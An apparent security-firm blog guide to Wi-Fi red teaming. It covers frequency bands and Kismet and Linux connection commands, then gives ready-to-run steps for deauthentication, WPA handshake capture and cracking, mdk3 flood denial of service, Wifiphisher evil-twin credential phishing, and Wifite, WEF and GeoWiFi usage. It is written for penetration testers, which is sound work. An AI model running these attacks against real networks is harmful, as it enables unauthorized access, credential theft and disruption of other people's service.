A Red Teamer’s Guide to Wi-Fi Exploits

Red Teamer’s Guide to Wi-Fi Exploits

Read In This Article

Wireless Technology and Frequency Spectrum Overview

Understanding the frequency spectrum and its various applications is crucial for professionals working with wireless technologies. This document outlines the frequency ranges and associated technologies, providing insights into their usage and characteristics.

Frequency Bands and Technologies

  1. RFID (Radio Frequency Identification)
    • LF (Low Frequency): 120-150 kHz
    • HF (High Frequency): 13.56 MHz
    • UHF (Ultra-High Frequency): 433 MHz
  2. Keyless Entry Systems
    • North America: 315 MHz
    • Europe and Asia: 433.92 MHz
  3. Cellular Frequencies (US)
    • 698-894 MHz: LTE Band 12, 13, 17
    • 1710-1755 MHz: AWS (Advanced Wireless Services)
    • 1850-1910 MHz: PCS (Personal Communications Service)
    • 2110-2155 MHz: AWS
  4. Global Positioning System (GPS)
    • L1: 1575.42 MHz
    • L2: 1227.60 MHz
  5. L Band
    • Frequency Range: 1-2 GHz
  6. 802.15.4 (ZigBee)
    • Europe: 868 MHz
    • US and Australia: 915 MHz
  7. 802.15.1 (Bluetooth)
    • Frequency Range: 2.4-2.483.5 GHz
  8. Wi-Fi Standards
    • 802.11 b/g: 2.4 GHz
    • 802.11a: 5.0 GHz
    • 802.11n: 2.4/5.0 GHz
  9. Satellite and Microwave Communication
    • C Band: 4-8 GHz
    • Ku Band: 12-18 GHz
    • K Band: 18-26.5 GHz
    • Ka Band: 26.5-40 GHz

Tools and Commands

To work effectively with these frequencies and technologies, various tools and commands are used by engineers and technicians:

FCC ID Lookup

For identifying devices and their frequency allocations, the FCC ID lookup tool is invaluable:

Frequency Databases

Accessing a comprehensive database for frequency information is essential for planning and troubleshooting:

Practical Commands

Linux Networking Commands

View Wireless Interfaces:

iwconfig

Monitor Mode Activation:

airmon-ng start wlan0

Packet Capture:

airodump-ng wlan0mon

Bluetooth Scanning

  • **Scan for Bluetooth Devices: **
hcitool scan

ZigBee Network Analysis

  • Scan for ZigBee Channels:
sudo zbstumbler /dev/ttyUSB0

Wireless Hacking with Kismet and Linux Wi-Fi Commands

Kismet is a powerful wireless network detector, sniffer, and intrusion detection system. It supports multiple wireless cards and is compatible with various protocols. Below is a comprehensive guide to Kismet commands and essential Linux Wi-Fi commands for effective wireless network management and analysis.

Kismet Commands

Kismet provides a variety of commands for managing and analyzing wireless networks. Here is a detailed table of the Kismet commands along with their descriptions:

CommandDescription
eShow Kismet servers
hDisplay help
zFull-screen display
nShow current network number
mMute sound
iNetwork details
tTag or untag a network
sSort the network list
gGroup tagged networks
lShow wireless card power levels
uUngroup the current group
dDisplay settings
cShow current network users
rPacket rate graph
LLock channel to the selected channel
aDisplay network statistics
HReturn to normal channel hopping
pPacket type capture
+/-Expand/collapse network groups
fCenter the network
CTRL+LRedraw the screen
wTrack alerts
QQuit Kismet
XClose popup window

Essential Linux Wi-Fi Commands

Managing Wi-Fi networks in Linux involves using various command-line tools for configuration, monitoring, and troubleshooting. Below is a table of essential Linux Wi-Fi commands:

CommandDescription
iwconfigConfigure wireless network interfaces
rfkill listDisplay the status of RF (radio frequency) devices
rfkill unblock allEnable all RF devices (e.g., Wi-Fi)
airodump-ng mon0Monitor all wireless network interfaces

Practical Examples

Using Kismet

Starting Kismet

sudo kismet
  1. Viewing Network Details
    • Press i to see the details of a selected network.
  2. Sorting the Network List
    • Press s to sort the list of detected networks.
  3. Displaying Current Users
    • Press c to display the users connected to the current network.

Using Linux Wi-Fi Commands

  1. Configuring Wireless Interfaces
sudo iwconfig wlan0 essid "YourNetworkSSID" key s:password

Checking RF Device Status

sudo rfkill list

Unblocking All RF Devices

sudo rfkill unblock all

Monitoring Wireless Interfaces

sudo airodump-ng mon0

Connecting to Wireless Networks in Linux

Below is a detailed guide on connecting to various types of wireless networks in Linux using command-line tools. This guide covers connections to unsecured networks, WEP, WPA-PSK, and WPA-Enterprise networks.

Connecting to an Unsecured Network

To connect to an unsecured (open) network, use the following commands:

CommandDescription
iwconfig ath0 essid $SSIDSet the SSID of the wireless network
ifconfig ath0 upBring the wireless interface up
dhclient ath0Obtain an IP address via DHCP

Example:

iwconfig ath0 essid "OpenNetwork"
ifconfig ath0 up
dhclient ath0

Connecting to a WEP Network

To connect to a WEP-secured network, use the following commands:

CommandDescription
iwconfig ath0 essid $SSID keySet the SSID and WEP key
ifconfig ath0 upBring the wireless interface up
dhclient ath0Obtain an IP address via DHCP

Example:

iwconfig ath0 essid "WEPNetwork" key s:your_wep_key
ifconfig ath0 up
dhclient ath0

Connecting to a WPA-PSK Network

To connect to a WPA-PSK (Pre-Shared Key) network, use the following commands:

CommandDescription
iwconfig ath0 essid $SSIDSet the SSID of the wireless network
ifconfig ath0 upBring the wireless interface up
wpa_supplicant -B -i ath0 -c wpa-psk.confStart the WPA supplicant daemon with the config
dhclient ath0Obtain an IP address via DHCP

Example:

  1. Create a WPA-PSK configuration file (wpa-psk.conf)
network={
    ssid="WPA_PSK_Network"
    psk="your_wpa_psk_password"
}
  1. Run the commands:
iwconfig ath0 essid "WPA_PSK_Network"
ifconfig ath0 up
wpa_supplicant -B -i ath0 -c wpa-psk.conf
dhclient ath0

Connecting to a WPA-Enterprise Network

To connect to a WPA-Enterprise network, use the following commands:

CommandDescription
iwconfig ath0 essid $SSIDSet the SSID of the wireless network
ifconfig ath0 upBring the wireless interface up
wpa_supplicant -B -i ath0 -c wpa-ent.confStart the WPA supplicant daemon with the config
dhclient ath0Obtain an IP address via DHCP

Example:

Create a WPA-Enterprise configuration file (wpa-ent.conf):

network={
    ssid="WPA_Enterprise_Network"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="your_username"
    password="your_password"
    phase2="auth=MSCHAPV2"
}

Run the commands:

iwconfig ath0 essid "WPA_Enterprise_Network"
ifconfig ath0 up
wpa_supplicant -B -i ath0 -c wpa-ent.conf
dhclient ath0

Wi-Fi Network Testing in Linux

Testing Wi-Fi networks in Linux involves a series of commands to place wireless interfaces into monitor mode, capture handshakes, perform brute force attacks, and conduct denial-of-service (DoS) attacks. This guide provides a structured approach to these tasks using common tools such as airmon-ng, airodump-ng, aireplay-ng, aircrack-ng, mdk3, and others.

Setting Up Monitor Mode

To begin testing, you need to place your wireless interface into monitor mode. This allows you to capture all wireless traffic in your vicinity.

CommandDescription
airmon-ng stop ath0Stop any processes on ath0 to prepare for monitor mode
airmon-ng start wifi0Start monitor mode on wifi0 interface
iwconfig ath0 channel $CHSet the channel on ath0 to channel $CH

Example:

airmon-ng stop ath0
airmon-ng start wifi0
iwconfig ath0 channel 6

Capturing Client Handshake

Capturing the WPA/WPA2 handshake is crucial for performing brute force attacks.

CommandDescription
airodump-ng -c $CH --bssid $AP -w file ath0Capture traffic on channel $CH from access point $AP and save to file
aireplay-ng -0 10 -a $AP -c $CH ath0Send 10 de-authentication packets to force clients to reconnect, capturing the handshake

Example:

airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capture ath0
aireplay-ng -0 10 -a 00:11:22:33:44:55 -c 00:22:33:44:55:66 ath0

Brute Force Handshake Attack

Once the handshake is captured, a brute force attack can be attempted to find the WPA-PSK.

CommandDescription
aircrack-ng -w wordlist capture.capBrute force WPA-PSK using wordlist against capture.cap
asleap -r capture.cap -w dict.asleapBrute force LEAP using dict.asleap against capture.cap
eapmd5pass -r capture.cap -w wordlistBrute force EAP-MD5 using wordlist against capture.cap

Example:

aircrack-ng -w wordlist.txt capture.cap
asleap -r capture.cap -w dict.asleap
eapmd5pass -r capture.cap -w wordlist.txt

Denial of Service (DoS) Attack

Performing a DoS attack can flood the network with various types of packets, disrupting service.

CommandDescription
mdk3 int a -a $APAuthentication flood on $AP
mdk3 int b -c $CHBeacon flood on channel $CH

Example:

mdk3 wlan0 a -a 00:11:22:33:44:55
mdk3 wlan0 b -c 6

Wifiphisher Overview and Usage Guide

Wifiphisher is a powerful, flexible, modular, easy-to-use tool for conducting man-in-the-middle (MiTM) attacks to obtain credentials from unsuspecting Wi-Fi users. This tool runs on Linux and is especially effective when deployed on a Raspberry Pi. It supports various Wi-Fi association techniques, such as Evil Twin, KARMA, and Known Beacons, and comes with community-driven phishing templates for different scenarios.

Key Features

  • Powerful: Capable of running for extended periods on devices like Raspberry Pi, employing various Wi-Fi association techniques.
  • Flexible: Supports numerous arguments and community-driven phishing templates.
  • Modular: Users can write Python modules to expand functionality or create custom phishing scenarios.
  • Easy to Use: Beginners can start with simple commands, while advanced users can utilize the full feature set.
  • Research-Backed: Incorporates state-of-the-art phishing techniques disclosed by developers.
  • Community-Supported: Developed and maintained by an active community.
  • Free: Available for free download with full source code under the GPLv3 license.

How It Works

Wi-Fi phishing with Wifiphisher involves two main steps:

  1. Establishing MiTM Position: Wifiphisher uses techniques like Evil Twin, KARMA, and Known Beacons to associate with Wi-Fi clients unknowingly.
  2. Performing Phishing Attacks: Once a MiTM position is established, various phishing attacks can be conducted, such as data sniffing or web-based credential capture.

Installation

To install the latest development version, use the following commands:

git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher
sudo python setup.py install

Example Commands

  1. Manual Interface Selection and Firmware Upgrade Scenario:
wifiphisher -aI wlan0 -jI wlan4 -p firmware-upgrade --handshake-capture handshake.pcap
  • -aI wlan0: Use wlan0 for spawning the rogue Access Point.
  • -jI wlan4: Use wlan4 for DoS attacks.
  • -p firmware-upgrade: Perform the “Firmware Upgrade” scenario.
  • --handshake-capture handshake.pcap: Verify the captured Pre-Shared Key against the handshake file.
  1. Automatic Interface Selection and Plugin Update Scenario:
wifiphisher --essid CONFERENCE_WIFI -p plugin_update -pK s3cr3tp4ssw0rd
  • --essid CONFERENCE_WIFI: Target the Wi-Fi network with ESSID “CONFERENCE_WIFI”.
  • -p plugin_update: Perform the “Plugin Update” scenario.
  • -pK s3cr3tp4ssw0rd: Protect the Evil Twin with PSK “s3cr3tp4ssw0rd”.
  1. Open Wi-Fi Network and OAuth Login Scenario:
wifiphisher --essid "FREE WI-FI" -p oauth-login -kB
  • --essid "FREE WI-FI": Spawn an open Wi-Fi network with ESSID “FREE WI-FI”.
  • -p oauth-login: Perform the “OAuth Login” scenario.
  • -kB: Use the Known Beacons technique.

Command-Line Options

Below is a table of useful command-line options for Wifiphisher:

Short FormLong FormDescription
-h--helpShow help message and exit
-i--interfaceChoose an interface that supports both AP and monitor modes
-eI--extensionsinterfaceChoose an interface that supports monitor mode for running extensions
-aI--apinterfaceChoose an interface that supports AP mode for spawning an AP
-pI--protectinterfaceSpecify interfaces protected from NetworkManager
-kN--keepnetworkmanagerDo not kill NetworkManager
-nE--noextensionsDo not load any extensions
-e--essidEnter the ESSID of the rogue Access Point
-pPD--phishing-pages-directorySearch for phishing pages in the specified directory
-p--phishingscenarioChoose the phishing scenario to run
-pK--presharedkeyAdd WPA/WPA2 protection on the rogue Access Point
-qS--quitonsuccessStop the script after successfully retrieving one pair of credentials
-lC--lure10-captureCapture BSSIDs during AP selection phase as part of Lure10 attack
-lE--lure10-exploitExploit the captured BSSIDs to fool Windows Location Service
-iAM--mac-ap-interfaceSpecify MAC address of the AP interface
-iEM--mac-extensions-interfaceSpecify MAC address of the extensions interface
-iNM--no-mac-randomizationDo not change any MAC address
-hC--handshake-captureCapture WPA/WPA2 handshakes for verifying passphrase
-dE--deauth-essidDeauth all BSSIDs in the WLAN with the specified ESSID
-dC--deauth-channelsChannels to deauth
--loggingEnable logging.Output will be saved to wifiphisher.log file
-lP--logpathDetermine the full path of the logfile
-cP--credential-log-pathDetermine the full path of the file that will store any captured credentials
-cM--channel-monitorMonitor if the target access point changes the channel
--payload-pathEnable the payload path.Intended for use with scenarios that serve payloads
-wP--wps-pbcMonitor if the button on a WPS-PBC Registrar side is pressed
-wAI--wpspbc-assoc-interfaceThe WLAN interface used for associating to the WPS Access Point
-kB--known-beaconsPerform the Known Beacons Wi-Fi automatic association technique
-fH--force-hostapdForce the usage of hostapd installed in the system
--dnsmasq-confDNSMASQ_CONFDetermine the full path of dnmasq.conf file
-dK--disable-karmaDisable KARMA attack
-pE--phishing-essidDetermine the ESSID you want to use for the phishing page

WEF (WiFi Exploitation Framework) Overview and Usage Guide

WEF is a comprehensive tool designed for executing a variety of Wi-Fi attacks. It supports numerous attack types, automatic handshake capture and cracking, and provides multiple templates for EvilTwin attacks in different languages. This guide provides an overview of its features, installation process, common usage commands, and available attacks.

Key Features

  • WPA/WPA2, WPS, and WEP Attacks: Supports a wide range of attacks on different Wi-Fi security protocols.
  • Automatic Handshake Capture and Cracking: Facilitates easy capture and cracking of WPA/WPA2 handshakes.
  • Multiple Templates for EvilTwin Attack: Offers various templates in different languages for conducting EvilTwin attacks.
  • Monitor Mode Management: Allows enabling/disabling monitor mode and viewing interface info (frequencies, chipset, MAC address).
  • 2.4 GHz and 5 GHz Support: Capable of attacking networks on both frequency bands.
  • Informative Attack Logs: Provides detailed logs of the conducted attacks.
  • Custom Wordlist Selector: Enables selection of custom wordlists when cracking.
  • Language Support: Available in English and Spanish.
git clone https://github.com/D3Ext/WEF
bash wef

Available Attacks

Attack TypeDescription
Deauthentication AttackDisconnects clients from a network.
WIDS Confusion AttackConfuses Wireless Intrusion Detection Systems.
Authentication AttackFloods AP with authentication requests.
Beacon Flood AttackFloods the airwaves with fake beacon frames.
TKIP Attack (Michael Shutdown Exploitation)Exploits vulnerabilities in TKIP.
Pixie Dust AttackOffline attack against WPS networks.
Null Pin AttackTests all-zero WPS pins.
PIN Bruteforce AttackAttempts to brute-force WPS pins.
ARP Replay AttackGenerates traffic to capture IVs for WEP cracking.
HIRTE AttackAttacks WEP-protected networks via clients.
Caffe Latte AttackCracks WEP keys by targeting clients.
Fake Authentication AttackFakes authentication to the target AP.
WPA/WPA2 Handshake Capture AttackCaptures WPA/WPA2 handshakes for cracking.
PMKID AttackExploits a vulnerability in WPA/WPA2 for handshakes.
EvilTwin AttackCreates a rogue AP to capture credentials.

Command-Line Options

Short FormLong FormDescription
-i--interfaceSpecify your network adapter interface in managed mode
-h--helpShow the help panel
--versionPrint the version and exit

GeoWiFi: WiFi Geolocation Data Search Tool

GeoWiFi is a powerful tool designed to search WiFi geolocation data by BSSID and SSID using various public databases. This guide covers its key features, installation, usage, and command options.

Key Features

  • Database Support: GeoWiFi queries multiple databases including Wigle, Apple, Google, Milnikov, WifiDB, and Combain.
  • Output Flexibility: Supports output in map or JSON format.
  • Custom Configuration: Allows API configuration through a YAML file.
  • Docker Support: Can be run using Docker for ease of deployment.

Installation

Prerequisites

  • Python 3
  • Windows Terminal (recommended for Windows users to display emojis)

Configuration

GeoWiFi uses a configuration file located at gw_utils/config.yaml to store API keys and other settings.

Example Configuration (config.yaml):

wigle_auth: "your_wigle_encoded_key"
google_api: "your_google_api_key"
combain_api: "your_combain_api_key"
no-ssl-verify: false

Usage

Command-Line Interface

usage: geowifi.py [-h] [-s {bssid,ssid}] [-o {map,json}] identifier

Search for information about a network with a specific BSSID or SSID.

positional arguments:
  identifier            The BSSID or SSID of the network to search for.

options:
  -h, --help            Show this help message and exit
  -s {bssid,ssid}, --search-by {bssid,ssid}
                        Specifies whether to search by BSSID or SSID (default: bssid)
  -o {map,json}, --output-format {map,json}
                        Specifies the output format for the search results (default: map)

Examples

  1. Search by BSSID:
python3 geowifi.py -s bssid 00:11:22:33:44:55

Search by SSID:

python3 geowifi.py -s ssid "NetworkName"

Output in JSON Format:

python3 geowifi.py -s bssid 00:11:22:33:44:55 -o json

Output in Map Format:

python3 geowifi.py -s ssid "NetworkName" -o map

PiDense: Monitoring Illegal Wireless Network Activities

Purpose

PiDense is designed to monitor and detect illegal wireless network activities. It focuses on identifying suspicious SSID broadcasts, detecting deauthentication attacks, and monitoring various wireless network anomalies such as KARMA attacks and WiFi Pineapple activities.

Capabilities

  • Detects similar SSID broadcasts
  • Detects SSID brute force attacks
  • Detects beacon floods
  • Monitors deauthentication attacks
  • Identifies unencrypted wireless network density
  • Monitors SSID broadcasts against a blacklist
  • Detects KARMA attacks
  • Monitors WiFi Pineapple activities

Soon to be Added Features

  • Pcap parsing
  • Company name setting for monitoring illegal wireless activities
  • Probe request analysis for SSID brute force detection
  • Beacon analysis for SSID flood detection

Working Principle

PiDense operates by monitoring wireless network activities and analyzing broadcasted SSIDs, encryption types, and detecting anomalies. It uses scapy for packet manipulation and analysis, and provides alerts when suspicious activities are detected.

Installation and Usage

Requirements

  • Hardware: TP-LINK TL-WN722N
  • Modules: scapy, time, termcolor, argparse
  • Operating System: Kali Linux

Command Options

The following table provides a summary of the primary commands and their usage for PiDense.

CommandDescription
git clone https://github.com/WiPi-Hunter/PiDense.gitClone the PiDense repository from GitHub
pip install scapy termcolor argparseInstall required Python modules
airmon-ng start wlan0Enable monitor mode on wlan0 using airmon-ng
ifconfig wlan0 downBring down the wlan0 interface
iwconfig wlan0 mode MonitorSet wlan0 to monitor mode
ifconfig wlan0 upBring up the wlan0 interface
cd PiDenseNavigate to the PiDense directory
python pidense.py -hDisplay help information for PiDense

Wifite: Wireless Network Auditing Tool

Wifite is a comprehensive Python script for auditing wireless networks, leveraging existing tools to automate the process of retrieving wireless access point passwords. This guide provides a detailed overview of Wifite’s features, installation, usage, and command options.

Purpose

Wifite automates wireless network attacks by utilizing various existing tools to perform the following actions:

  • WPS Offline Pixie-Dust attack
  • WPS Online Brute-Force PIN attack
  • WPA Handshake Capture + offline crack
  • WPA PMKID Hash Capture + offline crack
  • Various known WEP attacks

Key Features

FeatureDescription
WPS Pixie-Dust AttackOffline brute-force attack on WPS
WPS PIN AttackOnline brute-force attack on WPS PIN
WPA Handshake CaptureCaptures WPA handshake for offline cracking
WPA PMKID Hash CaptureCaptures PMKID hashes for offline cracking
WEP AttacksSupports multiple WEP attacks including fragmentation, chop-chop, aireplay, etc.
5GHz SupportSupports 5GHz frequency for some wireless cards
Automatic Handshake ValidationValidates handshakes with pyrit, tshark, cowpatty, and aircrack-ng
Cracked Password StorageStores cracked passwords and handshakes in the current directory
Verbose ModeProvides detailed output of executed commands for educational purposes
CompatibilityDesigned for Kali Linux and ParrotSec, with Python 3 support

Installation

Prerequisites

  • Wireless card capable of Monitor Mode and packet injection
  • Python (compatible with both Python2 and Python3)
  • Required Tools: iwconfig, ifconfig, aircrack-ng suite, tshark, reaver, bully, coWPAtty, pyrit, hashcat, hcxdumptool, hcxpcaptool

Usage

Command-Line Interface

usage: Wifite.py [options]

Wifite is a tool to automate wireless security auditing.

optional arguments:
  -h, --help    show this help message and exit
  -i, --iface   set the wireless interface (default: auto)
  -c, --channel set the channel (default: all channels)
  --pmkid       capture PMKID hashes (default: enabled)
  --pixie       use Pixie-Dust attack (default: enabled)
  --no-pixie    disable Pixie-Dust attack
  --wps-only    attack only WPS-enabled networks
  --no-wps      do not attack WPS-enabled networks
  --crack       crack captured handshakes/PMKID hashes with a wordlist
  --no-deauths  do not send deauth packets
  -v, --verbose increase verbosity of output

Examples

  1. Run Wifite with Default Settings: sudo ./Wifite.py
  2. Capture PMKID Hashes Only: sudo ./Wifite.py --pmkid
  3. Disable Pixie-Dust Attack: sudo ./Wifite.py --no-pixie
  4. Attack Only WPS-Enabled Networks: sudo ./Wifite.py --wps-only
  5. Crack Captured Handshakes with a Wordlist: sudo ./Wifite.py --crack -w /path/to/wordlist.txt

Free Consultation

For a Free Consultation And Analysis Of Your Business, Please Fill Out The Opposite Form, Our Team Will Contact You As Soon As Possible.